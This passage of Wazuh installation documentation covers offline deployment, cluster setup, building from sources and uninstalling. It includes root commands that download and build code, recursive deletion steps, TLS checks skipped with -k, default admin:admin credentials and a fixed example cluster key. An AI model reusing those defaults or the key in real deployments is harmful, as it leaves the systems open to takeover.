    • If you are performing an all-in-one deployment, replace "<indexer-node-ip>", "<wazuh-manager-ip>", and "<dashboard-node-ip>" with 127.0.0.1.

    • If you are performing a distributed deployment, replace the node names and IP values with the corresponding names and IP addresses. You need to do this for all the Wazuh server, Wazuh indexer, and Wazuh dashboard nodes. Add as many node fields as needed.

  5. Run the ./wazuh-install.sh -g command to create the certificates. For a multi-node cluster, these certificates need to be later deployed to all Wazuh instances in your cluster.

    # ./wazuh-install.sh -g
    
  6. Copy or move the following files to a directory on the host(s) from where the offline installation will be carried out. You can use scp for this.

    • wazuh-install.sh

    • wazuh-offline.tar.gz

    • wazuh-install-files.tar

Next steps

Once the Wazuh files are ready and copied to the specified hosts, it is necessary to install the Wazuh components.

Please make sure that a copy of the wazuh-install-files.tar and wazuh-offline.tar.gz files, created during the initial configuration step, is placed in your working directory.

Install Wazuh components using the assisted method
Single-node offline installation

Install and configure the single-node server on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture with the aid of the Wazuh assisted installation method.

Note

You need root user privileges to run all the commands described below.

Please, make sure that a copy of the wazuh-install-files.tar and wazuh-offline.tar.gz files, created during the initial configuration step, is placed in your working directory.

The following dependencies must be installed on the Wazuh single node.

  • coreutils

  • libcap

  1. To perform the offline installation with the --offline-installation of Wazuh server on a single-node using the assisted method, run:

    # bash wazuh-install.sh --offline-installation -a
    

    Once the installation is finished, the output shows the access credentials and a message that confirms that the installation was successful.

    INFO: --- Summary ---
    INFO: You can access the web interface https://<WAZUH_DASHBOARD_IP_ADDRESS>
        User: admin
        Password: <ADMIN_PASSWORD>
    INFO: Installation finished.
    
  2. Access the Wazuh web interface with your admin user credentials. This is the default administrator account for the Wazuh indexer and it allows you to access the Wazuh dashboard.

    • URL: https://<WAZUH_NODE_IP_ADDRESS>

    • Username: admin

    • Password: <ADMIN_PASSWORD>

Multi-node offline installation
Installing the Wazuh indexer

Install and configure the Wazuh indexer nodes on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture.

The following dependencies must be installed on the Wazuh indexer nodes.

  • coreutils

  1. Run the multi-node assisted method with the --offline-installation to perform an offline installation. Use the option --wazuh-indexer and the node name to install and configure the Wazuh indexer. The node name must be the same one used in config.yml for the initial configuration, for example, node-1.

    # bash wazuh-install.sh --offline-installation --wazuh-indexer node-1
    

    Repeat this step for every Wazuh indexer node in your cluster. Then proceed with initializing your multi-node cluster in the next step.

  2. Run the Wazuh assisted installation option --start-cluster on any Wazuh indexer node to load the new certificates information and start the cluster.

    # bash wazuh-install.sh --offline-installation --start-cluster
    

    Note

    You only have to initialize the cluster once, there is no need to run this command on every node.

Testing the cluster installation
  1. Run the following command to get the admin password:

    # tar -axf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt -O | grep -P "\'admin\'" -A 1
    
  2. Run the following command to confirm that the installation is successful. Replace <ADMIN_PASSWORD> with the password gotten from the output of the previous command. Replace <WAZUH_INDEXER_IP_ADDRESS> with the configured Wazuh indexer IP address:

    # curl -k -u admin:<ADMIN_PASSWORD> https://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
    {
      "name" : "node-1",
      "cluster_name" : "wazuh-cluster",
      "cluster_uuid" : "095jEW-oRJSFKLz5wmo5PA",
      "version" : {
        "number" : "7.10.2",
        "build_type" : "rpm",
        "build_hash" : "db90a415ff2fd428b4f7b3f800a51dc229287cb4",
        "build_date" : "2023-06-03T06:24:25.112415503Z",
        "build_snapshot" : false,
        "lucene_version" : "9.6.0",
        "minimum_wire_compatibility_version" : "7.10.0",
        "minimum_index_compatibility_version" : "7.0.0"
      },
      "tagline" : "The OpenSearch Project: https://opensearch.org/"
    }
    
  3. Verify that the cluster is running correctly. Replace <WAZUH_INDEXER_IP_ADDRESS> and <ADMIN_PASSWORD> in the following command, then execute it:

    # curl -k -u admin:<ADMIN_PASSWORD> https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    
Installing the Wazuh server

On systems with yum as package manager, the following dependencies must be installed on the Wazuh server nodes.

  • libcap

  1. Run the assisted method with --offline-installation to perform an offline installation. Use the option --wazuh-server followed by the node name to install the Wazuh server. The node name must be the same one used in config.yml for the initial configuration, for example, wazuh-1.

    # bash wazuh-install.sh --offline-installation --wazuh-server wazuh-1
    

Your Wazuh server is now successfully installed. Repeat this step on every Wazuh server node.

Installing the Wazuh dashboard

The following dependencies must be installed on the Wazuh dashboard node.

  • libcap

  1. Run the assisted method with --offline-installation to perform an offline installation. Use the option --wazuh-dashboard and the node name to install and configure the Wazuh dashboard. The node name must be the same one used in config.yml for the initial configuration, for example, dashboard.

    # bash wazuh-install.sh --offline-installation --wazuh-dashboard dashboard
    

    The default TCP port for the Wazuh web user interface (dashboard) is 443. You can change this port using the optional parameter -p|--port <PORT_NUMBER>. Some recommended ports are 8443, 8444, 8080, 8888, and 9000.

    Once the assistant finishes the installation, the output shows the access credentials and a message that confirms that the installation was successful.

    INFO: --- Summary ---
    INFO: You can access the web interface https://<WAZUH_DASHBOARD_IP_ADDRESS>
       User: admin
       Password: <ADMIN_PASSWORD>
    
    INFO: Installation finished.
    

    You now have installed and configured Wazuh. All passwords generated by the Wazuh installation assistant can be found in the wazuh-passwords.txt file inside the wazuh-install-files.tar archive. To print them, run the following command:

    # tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt
    
  2. Access the Wazuh web interface with your admin user credentials. This is the default administrator account for the Wazuh indexer and it allows you to access the Wazuh dashboard.

    • URL: https://<WAZUH_DASHBOARD_IP_ADDRESS>

    • Username: admin

    • Password: <ADMIN_PASSWORD>

    When you access the Wazuh dashboard for the first time, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser. For increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser instead. Alternatively, a certificate from a trusted authority can be configured.

Install Wazuh components step by step
  1. In the working directory where you placed wazuh-offline.tar.gz and wazuh-install-files.tar, execute the following command to decompress the installation files:

    # tar xf wazuh-offline.tar.gz
    # tar xf wazuh-install-files.tar
    

    You can check the SHA512 of the decompressed package files in wazuh-offline/wazuh-packages/. Find the SHA512 checksums in the Packages list.

Installing the Wazuh indexer

The following dependencies must be installed on the Wazuh indexer nodes.

  • coreutils

  1. Run the following commands to install the Wazuh indexer.

    # rpm --import ./wazuh-offline/wazuh-files/GPG-KEY-WAZUH
    # rpm -ivh ./wazuh-offline/wazuh-packages/wazuh-indexer*.rpm
    
  2. Run the following commands replacing <INDEXER_NODE_NAME> with the name of the Wazuh indexer node you are configuring as defined in config.yml. For example, node-1. This deploys the SSL certificates to encrypt communications between the Wazuh central components.

    # NODE_NAME=<INDEXER_NODE_NAME>
    
    # mkdir /etc/wazuh-indexer/certs
    # mv -n wazuh-install-files/$NODE_NAME.pem /etc/wazuh-indexer/certs/indexer.pem
    # mv -n wazuh-install-files/$NODE_NAME-key.pem /etc/wazuh-indexer/certs/indexer-key.pem
    # mv wazuh-install-files/admin-key.pem /etc/wazuh-indexer/certs/
    # mv wazuh-install-files/admin.pem /etc/wazuh-indexer/certs/
    # cp wazuh-install-files/root-ca.pem /etc/wazuh-indexer/certs/
    # chmod 500 /etc/wazuh-indexer/certs
    # chmod 400 /etc/wazuh-indexer/certs/*
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/certs
    

    Here you move the node certificate and key files, such as node-1.pem and node-1-key.pem, to their corresponding certs folder. They're specific to the node and are not required on the other nodes. However, note that the root-ca.pem certificate isn't moved but copied to the certs folder. This way, you can continue deploying it to other component folders in the next steps.

  3. Edit /etc/wazuh-indexer/opensearch.yml and replace the following values:

    1. network.host: Sets the address of this node for both HTTP and transport traffic. The node will bind to this address and will also use it as its publish address. Accepts an IP address or a hostname.

      Use the same node address set in config.yml to create the SSL certificates.

    2. node.name: Name of the Wazuh indexer node as defined in the config.yml file. For example, node-1.

    3. cluster.initial_master_nodes: List of the names of the master-eligible nodes. These names are defined in the config.yml file. Uncomment the node-2 and node-3 lines, change the names, or add more lines, according to your config.yml definitions.

      cluster.initial_master_nodes:
      - "node-1"
      - "node-2"
      - "node-3"
      
    4. discovery.seed_hosts: List of the addresses of the master-eligible nodes. Each element can be either an IP address or a hostname. You may leave this setting commented if you are configuring the Wazuh indexer as a single-node. For multi-node configurations, uncomment this setting and set your master-eligible nodes addresses.

      discovery.seed_hosts:
        - "10.0.0.1"
        - "10.0.0.2"
        - "10.0.0.3"
      
    5. plugins.security.nodes_dn: List of the Distinguished Names of the certificates of all the Wazuh indexer cluster nodes. Uncomment the lines for node-2 and node-3 and change the common names (CN) and values according to your settings and your config.yml definitions.

      plugins.security.nodes_dn:
      - "CN=node-1,OU=Wazuh,O=Wazuh,L=California,C=US"
      - "CN=node-2,OU=Wazuh,O=Wazuh,L=California,C=US"
      - "CN=node-3,OU=Wazuh,O=Wazuh,L=California,C=US"
      
  4. Enable and start the Wazuh indexer service.

    # systemctl daemon-reload
    # systemctl enable wazuh-indexer
    # systemctl start wazuh-indexer
    
  5. For multi-node clusters, repeat the previous steps on every Wazuh indexer node.

  6. When all Wazuh indexer nodes are running, run the Wazuh indexer indexer-security-init.sh script on any Wazuh indexer node to load the new certificates information and start the cluster.

    # /usr/share/wazuh-indexer/bin/indexer-security-init.sh
    
  7. Run the following command to check that the installation is successful. Note that this command uses 127.0.0.1, set your Wazuh indexer address if necessary.

    # curl -XGET https://127.0.0.1:9200 -u admin:admin -k
    

    Expand the output to see an example response.

Installing the Wazuh server

On systems with apt as package manager, the following dependencies must be installed on the Wazuh server nodes.

  • gnupg

  • apt-transport-https

  1. Run the following commands to import the Wazuh key and install the Wazuh manager.

    # rpm --import ./wazuh-offline/wazuh-files/GPG-KEY-WAZUH
    # rpm -ivh ./wazuh-offline/wazuh-packages/wazuh-manager*.rpm
    
  2. Save the Wazuh indexer username and password into the Wazuh manager keystore using the wazuh-keystore tool:

    # echo '<INDEXER_USERNAME>' | /var/ossec/bin/wazuh-keystore -f indexer -k username
    # echo '<INDEXER_PASSWORD>' | /var/ossec/bin/wazuh-keystore -f indexer -k password
    

    Note

    The default offline-installation credentials are admin:admin

  3. Enable and start the Wazuh manager service.

    # systemctl daemon-reload
    # systemctl enable wazuh-manager
    # systemctl start wazuh-manager
    
  4. Run the following command to verify that the Wazuh manager status is active.

    # systemctl status wazuh-manager
    
Installing Filebeat

Filebeat must be installed and configured on the same server as the Wazuh manager.

  1. Run the following command to install Filebeat.

    # rpm -ivh ./wazuh-offline/wazuh-packages/filebeat*.rpm
    
  2. Move a copy of the configuration files to the appropriate location. Ensure to type “yes” at the prompt to overwrite /etc/filebeat/filebeat.yml.

    # cp ./wazuh-offline/wazuh-files/filebeat.yml /etc/filebeat/ &&\
    cp ./wazuh-offline/wazuh-files/wazuh-template.json /etc/filebeat/ &&\
    chmod go+r /etc/filebeat/wazuh-template.json
    
  3. Edit the /etc/filebeat/filebeat.yml configuration file and replace the following value:

    1. hosts: The list of Wazuh indexer nodes to connect to. You can use either IP addresses or hostnames. By default, the host is set to localhost hosts: ["127.0.0.1:9200"]. Replace your Wazuh indexer IP address accordingly.

      If you have more than one Wazuh indexer node, you can separate the addresses using commas. For example, hosts: ["10.0.0.1:9200", "10.0.0.2:9200", "10.0.0.3:9200"]

      # Wazuh - Filebeat configuration file
      output.elasticsearch:
      hosts: ["10.0.0.1:9200"]
      protocol: https
      username: ${username}
      password: ${password}
      
  4. Create a Filebeat keystore to securely store authentication credentials.

    # filebeat keystore create
    
  5. Add the username and password admin:admin to the secrets keystore.

    # echo admin | filebeat keystore add username --stdin --force
    # echo admin | filebeat keystore add password --stdin --force
    
  6. Install the Wazuh module for Filebeat.

    # tar -xzf ./wazuh-offline/wazuh-files/wazuh-filebeat-0.5.tar.gz -C /usr/share/filebeat/module
    
  7. Replace <SERVER_NODE_NAME> with your Wazuh server node certificate name, the same used in config.yml when creating the certificates. For example, wazuh-1. Then, move the certificates to their corresponding location.

    # NODE_NAME=<SERVER_NODE_NAME>
    
    # mkdir /etc/filebeat/certs
    # mv -n wazuh-install-files/$NODE_NAME.pem /etc/filebeat/certs/filebeat.pem
    # mv -n wazuh-install-files/$NODE_NAME-key.pem /etc/filebeat/certs/filebeat-key.pem
    # cp wazuh-install-files/root-ca.pem /etc/filebeat/certs/
    # chmod 500 /etc/filebeat/certs
    # chmod 400 /etc/filebeat/certs/*
    # chown -R root:root /etc/filebeat/certs
    
  8. Enable and start the Filebeat service.

    # systemctl daemon-reload
    # systemctl enable filebeat
    # systemctl start filebeat
    
  9. Run the following command to make sure Filebeat is successfully installed.

    # filebeat test output
    

    Expand the output to see an example response.

Your Wazuh server node is now successfully installed. Repeat the steps of this installation process stage for every Wazuh server node in your cluster, expand the Wazuh cluster configuration for multi-node deployment section below, and carry on then with configuring the Wazuh cluster. If you want a Wazuh server single-node cluster, everything is set and you can proceed directly with the Wazuh dashboard installation.

Wazuh cluster configuration for multi-node deployment

After completing the installation of the Wazuh server on every node, you need to configure one server node only as the master and the rest as workers.

Configuring the Wazuh server master node
  1. Edit the following settings in the /var/ossec/etc/ossec.conf configuration file.

    <cluster>
      <name>wazuh</name>
      <node_name>master-node</node_name>
      <node_type>master</node_type>
      <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
      <port>1516</port>
      <bind_addr>0.0.0.0</bind_addr>
      <nodes>
        <node><WAZUH_MASTER_ADDRESS></node>
      </nodes>
      <hidden>no</hidden>
      <disabled>no</disabled>
    </cluster>
    

    Parameters to be configured:

    name

    It indicates the name of the cluster.

    node_name

    It indicates the name of the current node.

    node_type

    It specifies the role of the node. It has to be set to master.

    key

    Key that is used to encrypt communication between cluster nodes. The key must be 32 characters long and the same for all of the nodes in the cluster. The following command can be used to generate a random key: openssl rand -hex 16.

    port

    It indicates the destination port for cluster communication.

    bind_addr

    It is the network IP to which the node is bound to listen for incoming requests (0.0.0.0 for any IP).

    nodes

    It is the address of the master node and can be either an IP or a DNS. This parameter must be specified in all nodes, including the master itself.

    hidden

    It shows or hides the cluster information in the generated alerts.

    disabled

    It indicates whether the node is enabled or disabled in the cluster. This option must be set to no.

  2. Restart the Wazuh manager.

    # systemctl restart wazuh-manager
    
Configuring the Wazuh server worker nodes
  1. Configure the cluster node by editing the following settings in the /var/ossec/etc/ossec.conf file and configure the necessary parameters:

    <cluster>
        <name>wazuh</name>
        <node_name>worker-node</node_name>
        <node_type>worker</node_type>
        <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
        <port>1516</port>
        <bind_addr>0.0.0.0</bind_addr>
        <nodes>
            <node><WAZUH_MASTER_ADDRESS></node>
        </nodes>
        <hidden>no</hidden>
        <disabled>no</disabled>
    </cluster>
    

    Parameters to be configured:

    name

    It indicates the name of the cluster.

    node_name

    It indicates the name of the current node. Each node of the cluster must have a unique name.

    node_type

    It specifies the role of the node. It has to be set as worker.

    key

    The key created previously for the master node. It has to be the same for all the nodes.

    nodes

    It has to contain the address of the master node and can be either an IP or a DNS.

    disabled

    It indicates whether the node is enabled or disabled in the cluster. It has to be set to no.

  2. Restart the Wazuh manager.

    # systemctl restart wazuh-manager
    

Repeat these configuration steps for every Wazuh server worker node in your cluster.

Testing Wazuh server cluster

To verify that the Wazuh cluster is enabled and all the nodes are connected, execute the following command:

# /var/ossec/bin/cluster_control -l

An example output of the command looks as follows:

NAME     TYPE    VERSION  ADDRESS
wazuh-1  master  4.12.0   10.0.0.3
wazuh-3  worker  4.12.0   10.0.0.5
wazuh-2  worker  4.12.0   10.0.0.4

Note that 10.0.0.3, 10.0.0.4, 10.0.0.5 are example IPs.

Installing the Wazuh dashboard

The following dependencies must be installed on the Wazuh dashboard node.

  • libcap

  1. Run the following commands to install the Wazuh dashboard.

    # rpm --import ./wazuh-offline/wazuh-files/GPG-KEY-WAZUH
    # rpm -ivh ./wazuh-offline/wazuh-packages/wazuh-dashboard*.rpm
    
  2. Replace <DASHBOARD_NODE_NAME> with your Wazuh dashboard node name, the same used in config.yml to create the certificates. For example, dashboard. Then, move the certificates to their corresponding location.

    # NODE_NAME=<DASHBOARD_NODE_NAME>
    
    # mkdir /etc/wazuh-dashboard/certs
    # mv -n wazuh-install-files/$NODE_NAME.pem /etc/wazuh-dashboard/certs/dashboard.pem
    # mv -n wazuh-install-files/$NODE_NAME-key.pem /etc/wazuh-dashboard/certs/dashboard-key.pem
    # cp wazuh-install-files/root-ca.pem /etc/wazuh-dashboard/certs/
    # chmod 500 /etc/wazuh-dashboard/certs
    # chmod 400 /etc/wazuh-dashboard/certs/*
    # chown -R wazuh-dashboard:wazuh-dashboard /etc/wazuh-dashboard/certs
    
  3. Edit the /etc/wazuh-dashboard/opensearch_dashboards.yml file and replace the following values:

    1. server.host: This setting specifies the host of the back end server. To allow remote users to connect, set the value to the IP address or DNS name of the Wazuh dashboard. The value 0.0.0.0 will accept all the available IP addresses of the host.

    2. opensearch.hosts: The URLs of the Wazuh indexer instances to use for all your queries. The Wazuh dashboard can be configured to connect to multiple Wazuh indexer nodes in the same cluster. The addresses of the nodes can be separated by commas. For example, ["https://10.0.0.2:9200", "https://10.0.0.3:9200","https://10.0.0.4:9200"]

         server.host: 0.0.0.0
         server.port: 443
         opensearch.hosts: https://127.0.0.1:9200
         opensearch.ssl.verificationMode: certificate
      
  4. Enable and start the Wazuh dashboard.

    # systemctl daemon-reload
    # systemctl enable wazuh-dashboard
    # systemctl start wazuh-dashboard
    
  5. Edit the file /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml and replace the url value with the IP address or hostname of the Wazuh server master node.

    hosts:
      - default:
          url: https://<WAZUH_SERVER_IP_ADDRESS>
          port: 55000
          username: wazuh-wui
          password: wazuh-wui
          run_as: false
    
  6. Run the following command to verify the Wazuh dashboard service is active.

    # systemctl status wazuh-dashboard
    
  7. Access the Wazuh web interface.

    • URL: https://<WAZUH_DASHBOARD_IP_ADDRESS>

    • Username: admin

    • Password: admin

Upon the first access to the Wazuh dashboard, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser or, for increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser. Alternatively, a certificate from a trusted authority can be configured.

Securing your Wazuh installation

You have now installed and configured all the Wazuh central components. We recommend changing the default credentials to protect your infrastructure from possible attacks.

Select your deployment type and follow the instructions to change the default passwords for both the Wazuh API and the Wazuh indexer users.

  1. Use the Wazuh passwords tool to change all the internal users passwords.

    # /usr/share/wazuh-indexer/plugins/opensearch-security/tools/wazuh-passwords-tool.sh --api --change-all --admin-user wazuh --admin-password wazuh
    
    INFO: The password for user admin is yWOzmNA.?Aoc+rQfDBcF71KZp?1xd7IO
    INFO: The password for user kibanaserver is nUa+66zY.eDF*2rRl5GKdgLxvgYQA+wo
    INFO: The password for user kibanaro is 0jHq.4i*VAgclnqFiXvZ5gtQq1D5LCcL
    INFO: The password for user logstash is hWW6U45rPoCT?oR.r.Baw2qaWz2iH8Ml
    INFO: The password for user readall is PNt5K+FpKDMO2TlxJ6Opb2D0mYl*I7FQ
    INFO: The password for user snapshotrestore is +GGz2noZZr2qVUK7xbtqjUup049tvLq.
    WARNING: Wazuh indexer passwords changed. Remember to update the password in the Wazuh dashboard and Filebeat nodes if necessary, and restart the services.
    INFO: The password for Wazuh API user wazuh is JYWz5Zdb3Yq+uOzOPyUU4oat0n60VmWI
    INFO: The password for Wazuh API user wazuh-wui is +fLddaCiZePxh24*?jC0nyNmgMGCKE+2
    INFO: Updated wazuh-wui user password in wazuh dashboard. Remember to restart the service.
    
Next steps

Once the Wazuh environment is ready, Wazuh agents can be installed on every endpoint to be monitored. To install the Wazuh agents and start monitoring the endpoints, see the Wazuh agent installation section. If you need to install them offline, you can check the appropriate agent package to download for your monitored system in the Wazuh agent packages list section.

To uninstall all the Wazuh central components, see the Uninstalling the Wazuh central components section.

Installation from sources

Installing from sources gives you more control over how Wazuh is deployed. You can customize build options and target operating systems that are not covered in existing packages.

Benefits of installing from sources
  • More control over compiler, libraries, and paths.

  • Ability to apply local patches or custom build flags.

The Wazuh manager and agent can be installed via sources as an alternative to the installation from packages:

Installing the Wazuh manager from sources

The Wazuh manager is the core component of the Wazuh server that processes and analyzes security data from Wazuh agents and other sources. It includes the analysis engine for log processing, rule evaluation, and alert generation, along with services for the Wazuh agent enrollment and connection.

This section covers installing dependencies, downloading and compiling the source code, running the installation wizard, and uninstalling the manager if needed.

Installing dependencies

Before compiling Wazuh from sources, you need to install the required build tools and libraries for the destination operating system. This section covers the essential development tools, compilers, and build utilities needed to compile the Wazuh manager successfully.

# apt-get update
# apt-get install python3 gcc g++ make libc6-dev curl policycoreutils automake autoconf libtool libssl-dev procps build-essential

CMake 3.18 installation

# curl -OL https://packages.wazuh.com/utils/cmake/cmake-3.18.3.tar.gz && tar -zxf cmake-3.18.3.tar.gz && cd cmake-3.18.3 && ./bootstrap --no-system-curl && make -j$(nproc) && make install
# cd .. && rm -rf cmake-*

Optional: Install the following dependencies only when compiling the CPython from sources. Since v4.2.0, make deps TARGET=server will download a portable version of CPython ready to be installed. Nevertheless, you can download the CPython sources by adding the PYTHON_SOURCE flag when running make deps.

Follow these steps to install the required dependencies to build the Python interpreter:

# echo "deb-src http://archive.ubuntu.com/ubuntu $(lsb_release -cs) main" >> /etc/apt/sources.list
# apt-get update
# apt-get build-dep python3 -y

Note

The Python version from the previous command may change depending on the OS used to build the binaries. For more information, refer to the Install dependencies page.

Installing the Wazuh manager

This section walks you through downloading the Wazuh source code, compiling it, and running the installation wizard to set up the Wazuh manager on your system.

  1. Download and extract the latest version:

    # curl -Ls https://github.com/wazuh/wazuh/archive/v5.0.0.tar.gz | tar zx
    # cd wazuh-5.0.0
    
  2. If you have previously compiled for another platform, clean the build using the Makefile in src/:

    # make -C src clean
    # make -C src clean-deps
    
  3. Run the install.sh script. This will display a wizard to guide you through the installation process using the Wazuh sources:

    Warning

    If you want to enable the database output, check out the Alert management section before running the installation script.

    # ./install.sh
    

    The initial run might take some time as it downloads and processes the vulnerability detection content. To speed up this process, you can set the DOWNLOAD_CONTENT environment variable to y beforehand. The adjusted command downloads a pre-prepared database during installation.

    # DOWNLOAD_CONTENT=y ./install.sh
    
  4. When the script asks what kind of installation you want, type manager to install the Wazuh manager:

    1- What kind of installation do you want (manager, agent, local, hybrid, or help)? manager
    

    Note

    During the installation, users can decide the installation path. Execute the ./install.sh script and select the language, set the installation mode to manager, then set the installation path (Choose where to install Wazuh [/var/ossec]). The default installation path is /var/ossec. A commonly used custom path is /opt.

    Warning

    Be extremely careful not to select a critical installation directory if you choose a different path than the default. If the directory already exists, the installer will ask to delete the directory or proceed by installing Wazuh inside it.

  5. The installer asks if you want to start Wazuh at the end of the installation. If you choose not to, you can start it later with:

    # systemctl start wazuh-manager
    
Installing other Wazuh components

Once the Wazuh manager is installed from source, you can install the Wazuh indexer, Filebeat, and the Wazuh dashboard by following the Installation guide. The Wazuh indexer and dashboard are excluded from the installation from sources procedure, as they rely on pre-built packages.

Uninstall

This section provides instructions for completely removing the Wazuh manager installation from your system.

  1. To uninstall the Wazuh manager, set WAZUH_HOME with the current installation path:

    # WAZUH_HOME="/WAZUH/INSTALLATION/PATH"
    
  2. Stop the service:

    # service wazuh-manager stop 2> /dev/null
    
  3. Stop the daemon:

    # $WAZUH_HOME/bin/wazuh-control stop 2> /dev/null
    
  4. Remove the installation folder and all its content:

    # rm -rf $WAZUH_HOME
    
  5. Delete the service:

    # [ -f /etc/rc.local ] && sed -i'' '/wazuh-control start/d' /etc/rc.local
    # find /etc/{init.d,rc*.d} -name "*wazuh*" | xargs rm -f
    
  6. Remove Wazuh user and group:

    # userdel wazuh 2> /dev/null
    # groupdel wazuh 2> /dev/null
    
Installing the Wazuh agent from sources

The Wazuh agent is a lightweight monitoring software. It is a multi-platform component that provides visibility into the endpoint’s security by collecting critical system and application logs/events. The following section explains how to install it from sources across different operating systems.

This section covers installing dependencies, downloading and compiling the source code, running the installation wizard, and uninstalling the Wazuh agent if necessary.

Installing dependencies

Before compiling Wazuh from sources, you need to install the required build tools and libraries for the destination operating system. This section covers the essential development tools, compilers, and build utilities needed to compile the Wazuh agent successfully on different platforms.

Note

You need root user privileges to run all the commands described below. Since Wazuh 3.5, an Internet connection is required to follow this process.

Note

CMake 3.12.4 is the minimal library version required to build the Wazuh agent solution.

Note

GCC 9.4 is the minimal compiler version required to build the Wazuh agent solution.

  1. Install development tools and compilers. In Linux, this can easily be done using your distribution’s package manager:

# apt-get install python3 gcc g++ make libc6-dev curl policycoreutils automake autoconf libtool libssl-dev procps build-essential

CMake 3.18 installation

# curl -OL https://packages.wazuh.com/utils/cmake/cmake-3.18.3.tar.gz && tar -zxf cmake-3.18.3.tar.gz && cd cmake-3.18.3 && ./bootstrap --no-system-curl && make -j$(nproc) && make install
# cd .. && rm -rf cmake-*
Installing the Wazuh agent

This section walks you through downloading the Wazuh source code, compiling it, and running the installation wizard to set up the Wazuh agent on your system.

  1. Download and extract the latest version:

    # curl -Ls https://github.com/wazuh/wazuh/archive/v5.0.0.tar.gz | tar zx
    # cd wazuh-5.0.0
    
  2. If you have previously compiled for another platform, you must clean the build using the Makefile in src/:

    # make -C src clean
    # make -C src clean-deps
    
  3. Build the Wazuh agent with gcc-14 and g++-14, this only applies to distributions with the Pacman package manager:

    # cd wazuh-5.0.0/src
    # make TARGET=agent deps
    # make TARGET=agent CC=gcc-14 CXX=g++-14
    # cd ..
    
  4. Run the install.sh script. This will run a wizard that will guide you through the installation process using the Wazuh sources:

    # cd wazuh-5.0.0
    # ./install.sh
    

    Note

    During the installation, users can decide the installation path. Execute the ./install.sh script and select the language, set the installation mode to agent, then set the installation path (Choose where to install Wazuh [/var/ossec]). The default installation path is /var/ossec. A commonly used custom path is /opt. When choosing a different path than the default, if the directory already exists, the installer will ask to delete the directory or proceed by installing Wazuh inside it. You can also run an unattended installation.

  5. The script will ask about what kind of installation you want. Type agent to install a Wazuh agent:

    1- What kind of installation do you want (manager, agent, local, hybrid or help)? agent
    
Next steps

Now that the agent is installed, the next step is to enroll the agent with the Wazuh server. Check the Wazuh agent enrollment section for more information about this process.

Uninstall
  1. To uninstall the Wazuh agent, set WAZUH_HOME with the current installation path:

    # WAZUH_HOME="/WAZUH/INSTALLATION/PATH"
    
  2. Stop the service:

    # service wazuh-agent stop 2> /dev/null
    
  3. Stop the daemon:

    # $WAZUH_HOME/bin/wazuh-control stop 2> /dev/null
    
  4. Remove the installation folder and all its content:

    # rm -rf $WAZUH_HOME
    
  5. Delete the service:

    # [ -f /etc/rc.local ] && sed -i'' '/wazuh-control start/d' /etc/rc.local
    # find /etc/{init.d,rc*.d} -name "*wazuh*" | xargs rm -f
    
  6. Remove Wazuh user and group:

    # userdel wazuh 2> /dev/null
    # groupdel wazuh 2> /dev/null
    

Deployment with Ansible

Ansible is an open source platform designed for automating tasks. It comes with Playbooks, a descriptive language based on YAML, that makes it easy to create and describe automation jobs. Also, Ansible communicates with every host over SSH, making it very secure. See Ansible Overview for more info.

Deployment with Puppet

Puppet is an open source software that automatically inspects, delivers, operates, and future-proofs all of your software, no matter where it is executed. It runs on many Unix-like systems as well as Microsoft Windows and includes its own declarative language to describe system configuration. It gives an alternative to install and configure Wazuh.

User manual

Welcome to the Wazuh user manual. Use it as your reference library once your basic Wazuh installation is ready. In this section, you will find content on topics such as Wazuh server administration, Wazuh agent enrollment, Wazuh capabilities, and many others that are listed below.

Cloud security

Wazuh helps increase the security of some of the most comprehensive and broadly adopted cloud platforms such as AWS, Microsoft Azure, or GCP. Learn more about Wazuh Cloud security in the below sections:

Monitoring Amazon Web Services (AWS)

Amazon Web Services (AWS) is a widely used cloud computing platform provided by Amazon. It offers a broad set of services, including computing power, storage, databases, machine learning, analytics, security, and more. AWS enables individuals, businesses, and organizations to access and utilize computing resources without the need to invest in and maintain physical infrastructure.

Wazuh, an open source security platform, provides a comprehensive suite of features to monitor and improve the security of your AWS infrastructure. You can install Wazuh agents on your EC2 instances or integrate the Wazuh module for AWS with supported AWS services. This allows you to analyze events and receive near real-time alerts for anomalies within your AWS infrastructure.

You can learn how to monitor your AWS infrastructure in the following sections:

Monitoring AWS instances

By installing the Wazuh agent on your AWS EC2 instances, you gain insights and monitor activities within these instances.

The Wazuh agent runs as a service on an EC2 instance, and collects and forwards system, security and application data to the Wazuh server through an encrypted and authenticated channel.

To install the Wazuh agent on an EC2 instance, follow the instructions available in the agent installation guide. The Wazuh agent allows you to monitor your EC2 instance with these capabilities:

To learn more about the different Wazuh capabilities, check out this section.

Monitoring AWS based services

The Wazuh module for AWS enables monitoring of various AWS services by collecting logs of these services and analyzing the logs with the Wazuh ruleset. This allows Wazuh to trigger alerts based on EC2 instance configuration, unauthorized behavior of users and systems, data stored on S3, and more. Thereby providing detailed information about activities within the AWS infrastructure.

Each section below contains detailed instructions to configure and set up all of the supported AWS services, and also the required Wazuh configuration to collect logs from these services. It also includes steps to resolve common issues that you may encounter.

This module requires several dependencies to work, and also the right credentials to access the AWS services. Take a look at the prerequisites section before proceeding.

Prerequisites

In this section, we outline the requirements for setting up Wazuh to retrieve logs from various AWS services.

Installing dependencies

You can configure the Wazuh module for AWS either in the Wazuh manager or in a Wazuh agent. This choice depends solely on how you access your AWS infrastructure in your environment.

You only need to install dependencies when configuring the integration with AWS in a Wazuh agent. The Wazuh manager already includes all the necessary dependencies.

We outline the dependencies needed to configure the integration on a Wazuh agent installed on a Linux endpoint.

Python

The Wazuh module for AWS is compatible with Python 3.8–3.13. While later Python versions should work as well, we can't assure they are compatible. If you do not have Python 3 already installed, run the following command on your monitored endpoint.

# apt-get update && apt-get install python3

You can install the required modules with Pip, the Python package manager. Most UNIX distributions have this tool available in their software repositories. Run the following command to install pip on your endpoint if you do not have it already installed.

